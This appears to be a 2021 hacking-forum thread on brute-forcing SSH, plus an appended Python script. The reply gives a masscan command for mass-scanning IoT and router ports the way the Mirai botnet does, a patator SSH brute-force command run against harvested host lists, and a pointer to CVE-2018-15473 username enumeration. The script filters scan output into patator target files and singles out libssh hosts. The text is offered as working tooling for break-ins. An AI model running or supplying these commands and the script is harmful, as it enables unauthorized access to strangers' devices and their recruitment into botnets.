Cracking SSH
by ksecurity - September 15, 2021 at 03:45 PM
#1
Does cracking SSH make sense in 2021?

What will the community vote for? Which kind of scanning method is recommended these days?

1. Cracking SSH
2. Exploiting RCE bugs
3. Scanning for IOT Devices.
4. OSINT
#2
Cracking SSH makes sense if you crack the SSH of IoT devices and routers. Servers with their admins are a hard target.
If you are on Linux, I think you should of course use masscan/zmap, but masscan is better and I will tell you about masscan. By default masscan scans IPs and ports and checks whether a port is open or not; it does not check whether the SSH service is on that port. You can add the option --banners, then masscan will grab the banners of the services on open ports.
For example:
sudo masscan -iL fileWithIps --open -p 1900-2300,22,2323,3232,1234,12345 --banners --rate=5000 -oL YourOutputFile
-iL - file with IPs.
--open - report only open (not filtered) ports
-p - ports
--rate - packets per second
-oL - output file (list format)
After masscan has done its work, you will have the open ports and banners in the output file. If you need to see all ports with SSH:
cat YourOutputFile | grep ssh
What about exploits? libssh is very nice for RCE. However, the more popular OpenSSH is better protected than libssh. I usually use CVE-2018-15473 (username enumeration, not RCE).
If you are looking for IoT devices, you need to set the scanning ports to 23,2323,32,3232,22 (as the bots of the Mirai botnet do) and the other ports that IoT devices usually use.
Bruteforce. I think the best bruteforcer is patator. For example:
python3 patator.py ssh_login host=COMBO00 port=COMBO01 user=FILE1 password=FILE2 0=hosts_ports.txt 1=users.txt 2=pass.txt -l outDir --threads 32 -x free=host:fgrep='No route to host' -x free=host:fgrep='Bad authentication type' -x ignore:code=1
(OpenSSH usually sends 'Bad authentication type' if you need a public key; 'No route to host' if the host is down)
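As an added example (not code from the reply above, nor from masscan or patator), the following Python script does the "grep ssh" step properly: it parses masscan's -oL list output, keeps only ports whose grabbed banner is actually an SSH identification string (an "open" line alone does not prove SSH is there, as the reply notes), records which implementation answered (OpenSSH, dropbear or libssh, which matters for the libssh-vs-OpenSSH remark), and emits host:port lines in the COMBO00/COMBO01 format the patator command expects. The scan output embedded in the script is constructed sample data, and the file name ssh_targets.py in the usage comment is an assumption.

```python
"""Filter masscan -oL output down to real SSH listeners and write a patator
combo file (host:port per line).

Added example, not code from the post above. It assumes masscan was run
with --banners and -oL, whose line format is:

    open   tcp <port> <ip> <timestamp>
    banner tcp <port> <ip> <timestamp> <service> <banner text>

An 'open' line only proves the port answered; the 'banner' line with
service 'ssh' is what proves an SSH server is behind it.
"""
import re
import sys
from collections import Counter

# Constructed sample output (not a real scan): five open ports, three SSH.
# 192.0.2.14:22 is open but returned no banner, so it is not an SSH target.
SAMPLE_MASSCAN_LIST = """\
#masscan
open tcp 22 192.0.2.10 1631700000
banner tcp 22 192.0.2.10 1631700000 ssh SSH-2.0-OpenSSH_7.4
open tcp 2323 192.0.2.11 1631700001
banner tcp 2323 192.0.2.11 1631700001 ssh SSH-2.0-dropbear_2019.78
open tcp 22 192.0.2.12 1631700002
banner tcp 22 192.0.2.12 1631700002 ssh SSH-2.0-libssh_0.8.1
open tcp 1900 192.0.2.13 1631700003
banner tcp 1900 192.0.2.13 1631700003 http HTTP/1.1 200 OK
open tcp 22 192.0.2.14 1631700004
# end
"""

# SSH identification string (RFC 4253): SSH-<protoversion>-<softwareversion>
SSH_ID_RE = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)")

# Implementations worth telling apart when triaging targets.
KNOWN_IMPLS = ("openssh", "dropbear", "libssh")


def parse_masscan_list(text):
    """Yield (ip, port, service, banner) for every 'banner' line."""
    for line in text.splitlines():
        if not line.startswith("banner "):
            continue
        parts = line.split(" ", 6)  # banner text may itself contain spaces
        if len(parts) < 7:
            continue
        _, _proto, port, ip, _ts, service, banner = parts
        yield ip, int(port), service, banner


def classify(software):
    """Map the software part of an SSH banner to an implementation name."""
    s = software.lower()
    for name in KNOWN_IMPLS:
        if s.startswith(name):
            return name
    return "other"


def ssh_targets(text):
    """Return a list of dicts describing only the ports that spoke SSH."""
    targets = []
    for ip, port, service, banner in parse_masscan_list(text):
        if service != "ssh":
            continue
        m = SSH_ID_RE.match(banner)
        software = m.group("software") if m else "unknown"
        targets.append({
            "ip": ip,
            "port": port,
            "software": software,
            "impl": classify(software),
        })
    return targets


def combo_lines(targets, sep=":"):
    """Lines for patator's COMBO00/COMBO01 file; ':' is patator's default separator."""
    return [f"{t['ip']}{sep}{t['port']}" for t in targets]


def impl_summary(targets):
    """Count targets per implementation (e.g. how many libssh hosts were found)."""
    return Counter(t["impl"] for t in targets)


if __name__ == "__main__":
    # Usage (file name is an assumption): python3 ssh_targets.py YourOutputFile > hosts_ports.txt
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MASSCAN_LIST
    found = ssh_targets(data)
    print("\n".join(combo_lines(found)))
    print(f"# {len(found)} ssh listeners: {dict(impl_summary(found))}", file=sys.stderr)
```

Run it on the sample and it prints three host:port lines (the OpenSSH, dropbear and libssh listeners) and drops both the HTTP banner on 1900 and the bannerless open port 22, which a plain grep for "ssh" over the whole list file would not distinguish from the rest.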
